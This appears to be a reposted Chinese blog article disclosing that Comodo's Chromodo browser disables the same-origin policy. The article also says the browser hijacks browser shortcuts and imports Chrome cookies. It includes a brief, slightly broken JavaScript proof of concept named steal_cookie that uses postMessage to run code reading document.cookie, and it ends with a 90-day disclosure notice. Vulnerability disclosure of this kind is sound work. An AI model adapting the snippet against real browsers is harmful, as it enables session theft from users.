当前位置:首页 > 技术分析 > 正文内容

Chromodo浏览器禁用了同源策略,网络安全也随之消失

ruisui883周前 (04-07)技术分析11

阅读:2071次 点赞(0)收藏

Comodo(科摩多)是美国的一家软件公司,是世界优秀的IT安全服务提供商和SSL证书的供应商之一,总部设在新泽西州泽西城,成立于1998年。其产品涉及范围较广,包含数字证书,安全软件以及安全周边软件。其免费产品也很多,包括安全套装在内均有免费版。

总的来说,Comodo的产品以严谨出名,防火墙严格的设置规则受到很多用户的喜爱,但该公司的反病毒产品功能并不是很强。

当你安装了Comodo网络安全套件之后,你将发现Comodo会默认安装一款名为Chromodo的新型网页浏览器,并且还会将其设为系统的默认浏览器。除此之外,系统中所有浏览器的快捷方式都会被Chromodo的地址所替换,该浏览器还会从Chrome浏览器中导入所有的设置以及cookie文件等信息。而且浏览器还会在某些情况下劫持主机的DNS设置。

Comodo将Chromodo浏览器描述为-“速度最快,安全等级最高,隐私保护最全面的浏览器”。但是实际上,这款浏览器并没有给用户提供任何的网络安全保护。因为他们禁用了同源策略!

具体示例请查看以下代码:




<script>
function steal_cookie(obj)
{
    // Wait for the page to load
    setTimeout(function {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code:    "(document.cookie)",
        }), "*");
    }, 2000);
}
</script>
Click Here

在此,我们将遵循90天的漏洞披露期限。如果90天之后,该公司没有提供相应的修复补丁,那么我们将会把这个漏洞的详细信息公布出来。

扫描二维码推送至手机访问。

版权声明:本文由ruisui88发布,如需转载请注明出处。

本文链接:http://www.ruisui88.com/post/3312.html

标签: 同源策略
分享给朋友:

“Chromodo浏览器禁用了同源策略,网络安全也随之消失” 的相关文章

供热收费管理系统一户多标准版

供热收费管理系统一户多标准版headerfooter《供热收费管理系统一户对标准版》是一款针对冬季供暖收费的管理软件,针对用户相同地址,存在不同的收费方式。同样为供热公司的规范收费、加强管理、提高服务档次必备的管理系统。 本系统包括:基础信息、收费管理等二个大模块。主要功能:1.基础信息(供热区设置...

Vue学习笔记之动态路由的参数传递应用及技巧

路由的参数传递:①通过params的类型· 配置路由格式:/router/:id· 传递的方式:在path后面跟上对应的值· 传递后形成的路径:/router/list,/router/profile这个就是前两篇中提到的"动态路由"中有应用过这个方法:②通过query的类型(对象方...

分享15个基于Vue3.0全家桶的优秀开源项目

大家好,我是 Echa。今天来分享 15 个基于 Vue3.0 全家桶的优秀开源项目!1. Vue Admin Bettergithub : https://github.com/chuzhixin/vue-admin-bettervue admin better 对比其他来源 admin 框架有如...

三勾点餐系统java+springboot+vue3,开源系统小程序点餐系统

项目简述前台实现:用户浏览菜单、菜品分类筛选、查看菜品详情、菜品多属性、菜品加料、添加购物车、购物车结算、个人订单查询、门店自提、外卖配送、菜品打包等。后台实现:菜品管理、订单管理、会员管理、系统管理、权限管理等。 项目介绍三勾点餐系统基于java+springboot+element-plus+u...

TDesign企业级开源设计系统越发成熟稳定,支持 Vue3 / 小程序

TDesing 发展越来越好了,出了好几套组件库,很成熟稳定了,新项目完全可以考虑使用。早在2021年,腾讯的 TDesing 刚发布不久,我就写了一篇简短的文章来介绍,当时主要关注的是 TDesign 的 Vue 组件库和用来搭建 admin 后台系统的实用性。虽然当时看起来不错,但还处于测试版,...